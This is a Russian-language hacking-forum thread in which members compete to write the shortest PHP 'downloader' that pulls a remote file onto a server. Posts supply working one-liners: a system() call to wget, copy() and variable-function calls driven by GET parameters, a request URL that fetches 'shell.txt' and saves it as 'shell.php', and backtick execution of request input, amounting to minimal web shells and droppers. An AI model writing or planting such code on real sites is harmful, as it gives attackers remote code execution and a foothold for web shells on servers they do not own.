Старый 05.03.2012, 13:41   #1
16bit
 
Регистрация: 16.06.2011
Сообщений: 66
Репутация: 9
По умолчанию самый маленький даунлоадер на php.

может кто-то помнит,как некоторое время назад некоторые хакеры соревновались в том,кто напишет самый короткий шеллкод.

предлагаю тему - написать наиболее короткий даунлоадер на пхп.
задача - с помощью пхп скачать файл на хост
условия - должны присутствовать хост и имя конечного файла.
lynx,wget,system,exec,etc - использовать нельзя
ось -юникс.
16bit вне форума   Ответить с цитированием
Старый 05.03.2012, 13:46   #2
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

<?php system("wget http://site.ru/1.bla -O /tmp/1.bla"); ?>
а так же fecth, lynx, curl, полно способов, в чем именно сложность?
faza02 вне форума   Ответить с цитированием
Старый 05.03.2012, 14:48   #3
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 351
Репутация: 105
По умолчанию

так ок?
PHP код:
<?php copy($_GET[1],$_GET[2]);
либо вообще через assert/eval:
PHP код:
<?php $_GET[1]($_GET[2]);
b3 вне форума   Ответить с цитированием
Старый 21.05.2013, 01:38   #4
Партос
 
Аватар для Партос
 
Регистрация: 21.05.2013
Сообщений: 1
Репутация: 0
По умолчанию

Цитата:
Сообщение от b3 Посмотреть сообщение
так ок?
PHP код:
<?php copy($_GET[1],$_GET[2]);
либо вообще через assert/eval:
PHP код:
<?php $_GET[1]($_GET[2]);
eval не отработает.
Партос вне форума   Ответить с цитированием
Старый 21.05.2013, 13:59   #5
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

почему?
12309 вне форума   Ответить с цитированием
Старый 21.05.2013, 15:00   #6
romashka_sky
 
Регистрация: 01.10.2011
Сообщений: 33
Репутация: 8
По умолчанию

Цитата:
Сообщение от 12309 Посмотреть сообщение
почему?
eval - конструкция языка

Цитата:
Variable functions won't work with language constructs such as echo, print, unset(), isset(), empty(), include, require and the like.
http://www.php.net/manual/en/functions.variable-functions.php
romashka_sky вне форума   Ответить с цитированием
Старый 23.05.2013, 16:48   #7
3t3st3r
 
Аватар для 3t3st3r
 
Регистрация: 16.11.2011
Сообщений: 9
Репутация: 0
По умолчанию

при условии register_globals=on и short_open_tag=on (об этом же ничего в условии не сказано))
Код:
<?copy($i,$o)?>
get.php?i=http://blabla/shell.txt&o=shell.php
3t3st3r вне форума   Ответить с цитированием
Старый 23.05.2013, 22:06   #8
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

Цитата:
Сообщение от 3t3st3r Посмотреть сообщение
при условии register_globals=on и short_open_tag=on (об этом же ничего в условии не сказано))
<?$a($b);

Последний раз редактировалось tex; 23.05.2013 в 22:09..
tex вне форума   Ответить с цитированием
Старый 11.07.2013, 07:54   #9
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от tex Посмотреть сообщение
<?$a($b);
PHP код:
<?`$i`;
Меньше уже некуда
NameSpace вне форума   Ответить с цитированием
Старый 11.07.2013, 08:28   #10
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 351
Репутация: 105
По умолчанию

NameSpace
Цитата:
условия - должны присутствовать хост и имя конечного файла.
lynx,wget,system,exec,etc - использовать нельзя
Тема наркаманская, нашли что сравнивать. Одно дело написать шеллкод и уложиться в нужное кол-во байт но пыху то че сюда приписали))

Да и код такого такого рода имеет 3 зависимости для работоспособности.
Цитата:
<?`$i`;
b3 вне форума   Ответить с цитированием
Ответ

Метки
php tricks

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd. Перевод: zCarot